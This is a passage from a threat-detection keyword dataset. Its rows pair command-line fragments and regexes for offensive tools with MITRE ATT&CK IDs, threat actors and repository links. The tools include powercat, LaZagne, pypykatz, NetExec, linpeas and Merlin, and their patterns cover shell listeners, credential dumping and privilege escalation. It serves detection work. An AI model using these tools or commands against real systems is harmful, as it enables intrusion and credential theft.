-ge*",".{0,1000}\s\-l\s\-p\s.{0,1000}\s\-e\scmd\s\-ge.{0,1000}","offensive_tool_keyword","powercat","Netcat - The powershell version","T1571 - T1048.003 - T1095","TA0042 - 
TA0011","N/A","N/A","C2","https://github.com/besimorhino/powercat","1","0","N/A","N/A","10","10","2229","482","2024-03-05T18:05:07Z","2014-08-21T14:38:46Z","1918" "* l$a$$Pid *",".{0,1000}\sl\$a\$\$Pid\s.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","N/A","10","1","31","79","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z","1919" "* Ladon.ps1*",".{0,1000}\sLadon\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker 
- RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","1920" "* Ladon.py*",".{0,1000}\sLadon\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","1921" "* Lalin.sh*",".{0,1000}\sLalin\.sh.{0,1000}","offensive_tool_keyword","LALIN","this script automatically install any package for pentest with uptodate tools . and lazy command for run the tools like lazynmap . install another and update to new","T1588","N/A","N/A","N/A","Exploitation tool","https://github.com/screetsec/LALIN","1","0","N/A","N/A","N/A","4","366","150","2017-04-13T13:47:21Z","2016-06-10T07:53:49Z","1922" "* lambdaenum.py*",".{0,1000}\slambdaenum\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","1923" "* laps.py *--ldapserver*",".{0,1000}\slaps\.py\s.{0,1000}\-\-ldapserver.{0,1000}","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","0","N/A","N/A","10","3","267","35","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z","1924" "* laps.py *-u * -p *",".{0,1000}\slaps\.py\s.{0,1000}\-u\s.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","0","N/A","N/A","10","3","267","35","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z","1925" "* LAPSToolkit.ps1*",".{0,1000}\sLAPSToolkit\.ps1.{0,1000}","offensive_tool_keyword","LAPSToolkit","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - 
T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","LAPSToolkit","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","1926" "* LAPSToolkit.ps1*",".{0,1000}\sLAPSToolkit\.ps1.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","LAPSToolkit","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","1927" "* LatLoader.py*",".{0,1000}\sLatLoader\.py.{0,1000}","offensive_tool_keyword","LatLoader","PoC module to demonstrate automated lateral movement with the Havoc C2 framework","T1570 - T1071 - T1021 - T1563 - T1105","TA0008 - TA0011 - TA0002 - TA0010","N/A","N/A","Lateral Movement","https://github.com/icyguider/LatLoader","1","0","N/A","N/A","9","4","301","35","2023-12-09T00:28:32Z","2023-10-06T15:03:17Z","1928" "* LaZagne.py *",".{0,1000}\sLaZagne\.py\s.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","1929" "* laZagne.py*",".{0,1000}\slaZagne\.py.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","1930" "* lazypariah*",".{0,1000}\slazypariah.{0,1000}","offensive_tool_keyword","LAZYPARIAH","LAZYPARIAH - A Tool For Generating Reverse Shell Payloads On The Fly","T1059 - T1566 - T1212 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","Resource Development","https://github.com/octetsplicer/LAZYPARIAH","1","0","N/A","N/A","N/A","2","140","28","2022-06-18T08:59:45Z","2020-11-20T05:08:36Z","1931" "* ldap * --gmsa *dump*",".{0,1000}\sldap\s.{0,1000}\s\-\-gmsa\s.{0,1000}dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","1932" "* ldap * --trusted-for-delegation*",".{0,1000}\sldap\s.{0,1000}\s\-\-trusted\-for\-delegation.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","1933" "* ldap * -u * -p * --admin-count*",".{0,1000}\sldap\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-admin\-count.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","1934" "* ldap * -u * -p * -M whoami *",".{0,1000}\sldap\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-M\swhoami\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","1935" "* --ldap servicePrincipalName=* --domain * --user * --pass *",".{0,1000}\s\-\-ldap\sservicePrincipalName\=.{0,1000}\s\-\-domain\s.{0,1000}\s\-\-user\s.{0,1000}\s\-\-pass\s.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","1936" "* ldap-brute.nse*",".{0,1000}\sldap\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1937" "* ldap-novell-getpass.nse*",".{0,1000}\sldap\-novell\-getpass\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1938" "* ldapper.py*",".{0,1000}\sldapper\.py.{0,1000}","offensive_tool_keyword","LDAPPER","LDAP Querying without the Suck","T1087 - T1069 - T1018","TA0007","N/A","N/A","Discovery","https://github.com/shellster/LDAPPER","1","0","N/A","N/A","7","1","99","11","2024-11-09T03:53:26Z","2020-06-17T16:53:35Z","1939" "* ldapph.db*",".{0,1000}\sldapph\.db.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","N/A","7","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","1940" "* ldap-rootdse.nse*",".{0,1000}\sldap\-rootdse\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1941" "* ldap-search.nse*",".{0,1000}\sldap\-search\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1942" "* ldapsearch-ad.py*",".{0,1000}\sldapsearch\-ad\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","1943" "* --ldapusername * --ldappassword *",".{0,1000}\s\-\-ldapusername\s\s.{0,1000}\s\-\-ldappassword\s.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - 
Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","1944" "* ldeep_dump *",".{0,1000}\sldeep_dump\s.{0,1000}","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1087.002 - T1018 - T1482 - T1083","TA0007 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","0","N/A","N/A","5","5","465","54","2025-03-02T18:43:27Z","2018-10-22T18:21:44Z","1945" "* letmein.ps1*",".{0,1000}\sletmein\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","1946" "* lexmark-config.nse*",".{0,1000}\slexmark\-config\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1947" "* lfs_injection.exe*",".{0,1000}\slfs_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","1948" "* libprocesshider.so *",".{0,1000}\slibprocesshider\.so\s.{0,1000}","offensive_tool_keyword","libprocesshider","Hide a process under Linux using the ld preloader","T1055 - T1564 - T1620","TA0005 ","N/A","Sandworm","Defense Evasion","https://github.com/gianlucaborello/libprocesshider","1","0","#linux","N/A","9","10","1061","320","2019-08-02T14:28:28Z","2014-08-16T01:09:30Z","1949" "* libpwn.c*",".{0,1000}\slibpwn\.c.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","1950" "* libpwn.so*",".{0,1000}\slibpwn\.so.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","1951" "* link smb * merlinPipe*",".{0,1000}\slink\ssmb\s.{0,1000}\smerlinPipe.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","1952" "* linpeas.sh *",".{0,1000}\slinpeas\.sh\s.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","#linux","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","1953" "* linpeas.sh*",".{0,1000}\slinpeas\.sh.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","1954" "* -linpeas=http://*",".{0,1000}\s\-linpeas\=http\:\/\/.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 
Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","1955" "* -linpeas=http://127.0.0.1/linpeas.sh*",".{0,1000}\s\-linpeas\=http\:\/\/127\.0\.0\.1\/linpeas\.sh.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","1956" "* linux_stealth.py*",".{0,1000}\slinux_stealth\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#linux","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","1957" "* linWinPwn*",".{0,1000}\slinWinPwn.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black 
Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","1958" "* --list=hidden-options*",".{0,1000}\s\-\-list\=hidden\-options.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1959" "* -listen :* -socks * -cert * -agentpassword *",".{0,1000}\s\-listen\s\:.{0,1000}\s\-socks\s.{0,1000}\s\-cert\s.{0,1000}\s\-agentpassword\s.{0,1000}","offensive_tool_keyword","rsockstun","reverse socks tunneler with ntlm and proxy support","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","COZY BEAR","C2","https://github.com/llkat/rsockstun","1","0","N/A","N/A","10","10","53","22","2022-08-09T09:25:50Z","2018-10-17T09:51:11Z","1960" "* -ListMetasploitPayloads*",".{0,1000}\s\-ListMetasploitPayloads.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","1961" "* --list-payloads*",".{0,1000}\s\-\-list\-payloads.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. 
This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","N/A","10","1127","202","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z","1962" "* live dpapi blobfile *.blob*",".{0,1000}\slive\sdpapi\sblobfile\s.{0,1000}\.blob.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1964" "* live dpapi cred *",".{0,1000}\slive\sdpapi\scred\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1965" "* live dpapi keys -o *",".{0,1000}\slive\sdpapi\skeys\s\-o\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1966" "* live dpapi securestring *",".{0,1000}\slive\sdpapi\ssecurestring\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1967" "* live dpapi vcred *",".{0,1000}\slive\sdpapi\svcred\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - 
TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1968" "* live dpapi vpol *",".{0,1000}\slive\sdpapi\svpol\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1969" "* live dpapi wifi*",".{0,1000}\slive\sdpapi\swifi.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1970" "* live kerberos apreq *",".{0,1000}\slive\skerberos\sapreq\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1971" "* live kerberos dump*",".{0,1000}\slive\skerberos\sdump.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1972" "* live kerberos 